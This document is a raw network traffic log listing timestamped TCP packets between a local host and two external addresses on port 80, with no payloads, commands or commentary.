Oct 3, 2022 17:42:22.944822073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:23.440356970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:23.440435886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.154875994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.155333042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.182418108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182486057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182528973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182569981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182600975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.182610989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182638884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.182646036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182687998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182729006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182749033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.182770014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182815075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.182828903 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.183060884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210279942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210344076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210393906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210407019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210438013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210465908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210484028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210503101 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210527897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210578918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210580111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210624933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210670948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210695028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210712910 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210731030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210738897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210782051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210783958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210822105 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210829020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210879087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.210902929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210932016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210974932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.210985899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.211030006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.211040974 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.211071968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.211116076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.211118937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.211134911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.211162090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.211216927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238328934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238434076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238478899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238521099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238554955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238554955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238563061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238554955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238609076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238629103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238652945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238681078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238694906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238708019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238755941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238807917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238847971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238878965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.238924980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238969088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.238982916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239012003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239053965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239069939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239097118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239139080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239166021 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239186049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239212990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239242077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239262104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239315987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239335060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239381075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239381075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239424944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239425898 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239465952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239507914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239545107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239550114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239563942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239593029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239634037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239650965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239681959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239705086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239738941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239748955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239790916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239808083 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239835024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239876986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239888906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.239931107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239975929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.239999056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.240040064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.240041018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.240063906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.240089893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.240091085 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.241411924 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.247504950 CEST	80	49710	208.67.104.97	192.168.2.6
Oct 3, 2022 17:42:24.247590065 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:24.267246008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267291069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267333984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267379045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267438889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267452955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267460108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267452955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267452955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267493010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267525911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267556906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267587900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267635107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267652035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267678022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267700911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267729998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267749071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267771959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267791033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267792940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267812014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267836094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267877102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267919064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.267934084 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.267960072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268001080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268013000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268042088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268083096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268088102 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268105984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268122911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268138885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268165112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268174887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268207073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268218040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268249989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268296957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268306017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268318892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268362999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268377066 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268404961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268410921 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268448114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268490076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268503904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268516064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268553019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268558025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268573046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268599033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268610001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268640995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268692017 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268708944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268719912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268739939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268755913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268774986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268781900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268791914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268824100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268865108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268882990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268907070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268948078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268948078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268948078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.268995047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.268996000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269020081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269042015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269062042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269109011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269112110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269153118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269172907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269192934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269196987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269233942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269279003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269299984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269320965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269344091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269367933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269409895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269432068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269432068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269454956 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269459009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269481897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269506931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269509077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269525051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269551039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269602060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269619942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269642115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269671917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269684076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269687891 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269728899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269753933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269783974 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269793987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269803047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269839048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269879103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269892931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269920111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269947052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.269962072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.269965887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270003080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270010948 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270045996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270055056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270092010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270112991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270133018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270169973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270174980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270190001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270216942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270220041 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270262003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270267963 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270304918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270323992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270345926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270380974 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270390034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270401001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.270437002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.270479918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.297667027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.297713995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.297755003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.297796011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.297837019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.297878981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.297919989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.297960043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298010111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298060894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298058033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298058033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298105001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298145056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298146009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298188925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298295975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298309088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298315048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298342943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298346996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298369884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298413992 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298455000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298508883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298526049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298568010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298609972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298612118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298612118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298650980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298692942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298742056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298784018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298825026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298866034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298930883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.298943996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298944950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.298974037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299015045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299026966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299026966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299058914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299068928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299112082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299150944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299191952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299231052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299274921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299318075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299361944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299401045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299412012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299412012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299443007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299484015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299525976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299530983 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299530983 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299567938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299608946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299649000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299726963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299767017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299808025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299848080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299865007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299865007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.299890995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299961090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.299974918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:24.300065994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:24.560369015 CEST	80	49711	85.31.46.167	192.168.2.6
